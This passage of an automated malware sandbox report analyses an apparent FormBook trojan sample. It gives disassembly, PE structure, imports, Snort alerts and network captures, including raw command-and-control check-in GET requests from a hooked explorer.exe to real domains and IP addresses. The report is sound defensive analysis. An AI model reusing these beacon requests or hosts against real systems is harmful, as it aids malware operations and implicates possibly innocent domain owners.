                                              mov edi, 00435000h
                                              push edi
                                              call dword ptr [00407140h]
                                              call dword ptr [004070ACh]
                                              push eax
                                              push edi
                                              call 00007F6D64B7E8E1h
                                              push 00000000h
                                              call dword ptr [00407108h]
                                              cmp byte ptr [00435000h], 00000022h
                                              mov dword ptr [0042F420h], eax
                                              mov eax, edi
                                              jne 00007F6D64B7C11Ch
                                              mov byte ptr [esp+10h], 00000022h
                                              mov eax, 00000001h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74500xb4.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x900.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x5bfe0x5c00False0.677097486413data6.48704517882IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x70000x11fe0x1200False0.465494791667data5.27785481266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x90000x264d40x400False0.6669921875data5.22478733059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x380000x9000xa00False0.408203125data3.93987268299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x381900x2e8dataEnglishUnited States
                                              RT_DIALOG0x384780x100dataEnglishUnited States
                                              RT_DIALOG0x385780x11cdataEnglishUnited States
                                              RT_DIALOG0x386980x60dataEnglishUnited States
                                              RT_GROUP_ICON0x386f80x14dataEnglishUnited States
                                              RT_MANIFEST0x387100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                              Imports

                                              DLLImport
                                              KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                              USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                              SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              04/08/21-13:37:04.612041TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5162.241.24.122
                                              04/08/21-13:37:04.612041TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5162.241.24.122
                                              04/08/21-13:37:04.612041TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.5162.241.24.122
                                              04/08/21-13:37:25.585048TCP1201ATTACK-RESPONSES 403 Forbidden804972734.102.136.180192.168.2.5
                                              04/08/21-13:37:46.323564TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.5198.54.117.216
                                              04/08/21-13:37:46.323564TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.5198.54.117.216
                                              04/08/21-13:37:46.323564TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.5198.54.117.216

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 8, 2021 13:36:43.587795019 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:36:43.848344088 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:43.848656893 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:36:43.849073887 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:36:44.109415054 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:44.111809969 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:44.111838102 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:44.111856937 CEST8049716156.235.228.19192.168.2.5
                                              Apr 8, 2021 13:36:44.112157106 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:36:44.112689972 CEST4971680192.168.2.5156.235.228.19
                                              Apr 8, 2021 13:37:04.466284990 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:04.611691952 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:04.611871004 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:04.612040997 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:04.757215023 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:05.120718956 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:05.306682110 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:06.178244114 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:06.178476095 CEST8049717162.241.24.122192.168.2.5
                                              Apr 8, 2021 13:37:06.178538084 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:06.178571939 CEST4971780192.168.2.5162.241.24.122
                                              Apr 8, 2021 13:37:25.360469103 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.372937918 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:25.374186993 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.374999046 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.387336016 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:25.585047960 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:25.585079908 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:25.585359097 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.585391998 CEST4972780192.168.2.534.102.136.180
                                              Apr 8, 2021 13:37:25.598359108 CEST804972734.102.136.180192.168.2.5
                                              Apr 8, 2021 13:37:46.026494026 CEST4972980192.168.2.5198.54.117.216
                                              Apr 8, 2021 13:37:46.200994968 CEST8049729198.54.117.216192.168.2.5
                                              Apr 8, 2021 13:37:46.201217890 CEST4972980192.168.2.5198.54.117.216
                                              Apr 8, 2021 13:37:46.323564053 CEST4972980192.168.2.5198.54.117.216
                                              Apr 8, 2021 13:37:46.497680902 CEST8049729198.54.117.216192.168.2.5
                                              Apr 8, 2021 13:37:46.497711897 CEST8049729198.54.117.216192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 8, 2021 13:35:37.119110107 CEST6180553192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:37.131618977 CEST53618058.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:38.097498894 CEST5479553192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:38.110296965 CEST53547958.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:39.211736917 CEST4955753192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:39.224823952 CEST53495578.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:39.630197048 CEST6173353192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:39.648699045 CEST53617338.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:40.501914024 CEST6544753192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:40.515217066 CEST53654478.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:42.430141926 CEST5244153192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:42.442693949 CEST53524418.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:44.228476048 CEST6217653192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:44.240824938 CEST53621768.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:45.279925108 CEST5959653192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:45.292360067 CEST53595968.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:46.845416069 CEST6529653192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:46.858165026 CEST53652968.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:47.729898930 CEST6318353192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:47.743510962 CEST53631838.8.8.8192.168.2.5
                                              Apr 8, 2021 13:35:48.628005028 CEST6015153192.168.2.58.8.8.8
                                              Apr 8, 2021 13:35:48.640609980 CEST53601518.8.8.8192.168.2.5
                                              Apr 8, 2021 13:36:00.585047007 CEST5696953192.168.2.58.8.8.8
                                              Apr 8, 2021 13:36:00.632075071 CEST53569698.8.8.8192.168.2.5
                                              Apr 8, 2021 13:36:16.275763988 CEST5516153192.168.2.58.8.8.8
                                              Apr 8, 2021 13:36:16.288503885 CEST53551618.8.8.8192.168.2.5
                                              Apr 8, 2021 13:36:43.255197048 CEST5475753192.168.2.58.8.8.8
                                              Apr 8, 2021 13:36:43.574450970 CEST53547578.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:04.324068069 CEST4999253192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:04.464893103 CEST53499928.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:07.585866928 CEST6007553192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:07.598526955 CEST53600758.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:17.565593004 CEST5501653192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:17.585999012 CEST53550168.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:25.318161011 CEST6434553192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:25.359328985 CEST53643458.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:32.082010031 CEST5712853192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:32.116198063 CEST53571288.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:46.001332045 CEST5479153192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:46.024919987 CEST53547918.8.8.8192.168.2.5
                                              Apr 8, 2021 13:37:46.130285978 CEST5046353192.168.2.58.8.8.8
                                              Apr 8, 2021 13:37:46.142963886 CEST53504638.8.8.8192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Apr 8, 2021 13:36:43.255197048 CEST192.168.2.58.8.8.80x3a76Standard query (0)www.xyfs360.comA (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:04.324068069 CEST192.168.2.58.8.8.80x261fStandard query (0)www.riceandginger.comA (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:25.318161011 CEST192.168.2.58.8.8.80x10daStandard query (0)www.houseof2.comA (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.001332045 CEST192.168.2.58.8.8.80x7e6eStandard query (0)www.clickqrcoaster.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Apr 8, 2021 13:36:43.574450970 CEST8.8.8.8192.168.2.50x3a76No error (0)www.xyfs360.com156.235.228.19A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:04.464893103 CEST8.8.8.8192.168.2.50x261fNo error (0)www.riceandginger.comriceandginger.comCNAME (Canonical name)IN (0x0001)
                                              Apr 8, 2021 13:37:04.464893103 CEST8.8.8.8192.168.2.50x261fNo error (0)riceandginger.com162.241.24.122A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:25.359328985 CEST8.8.8.8192.168.2.50x10daNo error (0)www.houseof2.comhouseof2.comCNAME (Canonical name)IN (0x0001)
                                              Apr 8, 2021 13:37:25.359328985 CEST8.8.8.8192.168.2.50x10daNo error (0)houseof2.com34.102.136.180A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)www.clickqrcoaster.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                              Apr 8, 2021 13:37:46.024919987 CEST8.8.8.8192.168.2.50x7e6eNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.xyfs360.com
                                              • www.riceandginger.com
                                              • www.houseof2.com
                                              • www.clickqrcoaster.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.549716156.235.228.1980C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 8, 2021 13:36:43.849073887 CEST1175OUTGET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uG HTTP/1.1
                                              Host: www.xyfs360.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Apr 8, 2021 13:36:44.111809969 CEST1176INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 08 Apr 2021 11:36:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/5.6.30
                                              Data Raw: 36 36 30 0d 0a 20 20 20 0a 20 20 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 0a 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 47 72 61 79 3b 20 7d 0a 20 20 20 20 2e 65 78 70 5f 70 6f 70 20 7b 20 77 69 64 74 68 3a 33 36 30 70 78 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 31 30 30 70 78 3b 20 6c 65 66 74 3a 35 30 25 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 38 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 20 38 70 78 20 30 20 31 36 70 78 20 30 3b 20 7d 0a 20 20 20 20 2e 65 78 70 5f 70 6f 70 5f 68 65 61 64 65 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 5f 6f 66 66 2e 67 69 66 29 20 6e 6f 2d 72 65 70 65 61 74 3b 20 77 69 64 74 68 3a 32 32 35 70 78 3b 20 68 65 69 67 68 74 3a 35 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 20 7d 0a 20 20 20 20 2e 65 78 70 5f 70 6f 70 5f 73 65 70 20 7b 20 77 69 64 74 68 3a 37 35 25 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 67 72 61 79 3b 20 6d 61 72 67 69 6e 3a 38 70 78 20 30 3b 20 7d 0a 20 20 20 20 2e 65 78 70 5f 63 6f 6e 74 65 6e 74 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 30 30 30 30 3b 20 6d 61 72 67 69 6e 3a 30 20 32 34 70 78 3b 20 70 61 64 64 69 6e 67 3a 38 70 78 20 30 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 61 63 74 69 6f 6e 3d 22 70 61 67 65 73 2f 45 78 70 69 72 65 64 2e 61 73 70 78 22 20 69 64 3d 22 66 6f 72 6d 31 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 73 70 4e 65 74 48 69 64 64 65 6e 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 22 20 69 64 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 22 20 76 61 6c 75 65 3d 22 6b 6e 67 65 41 68 44 70 7a 68 33 51 41 36 48 2b 53 4f 4b 49 48 48 76 38 31 49 4c 46 37 2f 33 54 33 5a 2b 62 76 65 61 52 4d 79 46 4e 43 38 36 51 56 32 30 7a 48 46 39 6a 52 49 34 6a 30 65 76 6b 2f 35 73 67 53 6b 42 57 45 69 44 52 41 52 41 47 31 2f 6b 30 66 43 66 76 57 47 54 66 46 33 33 71 63 52 32 47 58 6c 2f 4f 52 44 6f 3d 22 20 2f 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 73 70 4e 65 74 48 69 64 64 65 6e 22 3e 0a 0a 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 47 45 4e 45 52 41 54 4f 52 22 20 69 64 3d 22 5f 5f 56 49 45 57 53 54 41 54 45 47 45 4e 45 52 41 54 4f 52 22 20 76 61 6c 75 65 3d 22 30 36 44 32 34 33 31 46 22 20 2f 3e 0a 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 78 70 5f 70 6f 70 22 20 3e 0a 20 20 20 20 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 78 70 5f 70 6f
                                              Data Ascii: 660 <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><style type="text/css"> body { background-color: Gray; } .exp_pop { width:360px; min-height:200px; background-color: #FFF; border-radius:10px; position:absolute; top:100px; left:50%; margin-left: -180px; padding: 8px 0 16px 0; } .exp_pop_header { background: url(http://www.namebrightstatic.com/images/logo_off.gif) no-repeat; width:225px; height:57px; margin-top:8px; } .exp_pop_sep { width:75%; border-top:1px solid gray; margin:8px 0; } .exp_content { font-size:20px; color: #FF0000; margin:0 24px; padding:8px 0; }</style></head><body> <form method="post" action="pages/Expired.aspx" id="form1"><div class="aspNetHidden"><input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="kngeAhDpzh3QA6H+SOKIHHv81ILF7/3T3Z+bveaRMyFNC86QV20zHF9jRI4j0evk/5sgSkBWEiDRARAG1/k0fCfvWGTfF33qcR2GXl/ORDo=" /></div><div class="aspNetHidden"><input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="06D2431F" /></div> <div> <div class="exp_pop" > <center> <div class="exp_po
                                              Apr 8, 2021 13:36:44.111838102 CEST1176INData Raw: 70 5f 68 65 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 63 65 6e 74 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 78 70 5f 70 6f 70 5f 73 65 70 22 3e 3c 2f 64 69 76 3e 3c 2f 63 65 6e 74 65 72
                                              Data Ascii: p_header"></div> </center> <center><div class="exp_pop_sep"></div></center> <div class="exp_content"> <center> <b>Warning!</b> StSjskswkj.com has expired. If this is your domain name you must renew i
                                              Apr 8, 2021 13:36:44.111856937 CEST1177INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.549717162.241.24.12280C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 8, 2021 13:37:04.612040997 CEST1177OUTGET /fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo HTTP/1.1
                                              Host: www.riceandginger.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Apr 8, 2021 13:37:06.178244114 CEST1178INHTTP/1.1 301 Moved Permanently
                                              Date: Thu, 08 Apr 2021 11:37:06 GMT
                                              Server: nginx/1.19.5
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Location: http://riceandginger.com/fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo
                                              host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                              X-Endurance-Cache-Level: 2
                                              X-Server-Cache: true
                                              X-Proxy-Cache: MISS


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.54972734.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 8, 2021 13:37:25.374999046 CEST5035OUTGET /fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/V HTTP/1.1
                                              Host: www.houseof2.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Apr 8, 2021 13:37:25.585047960 CEST5036INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Thu, 08 Apr 2021 11:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "606eb0b7-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.549729198.54.117.21680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 8, 2021 13:37:46.323564053 CEST5086OUTGET /fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo HTTP/1.1
                                              Host: www.clickqrcoaster.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
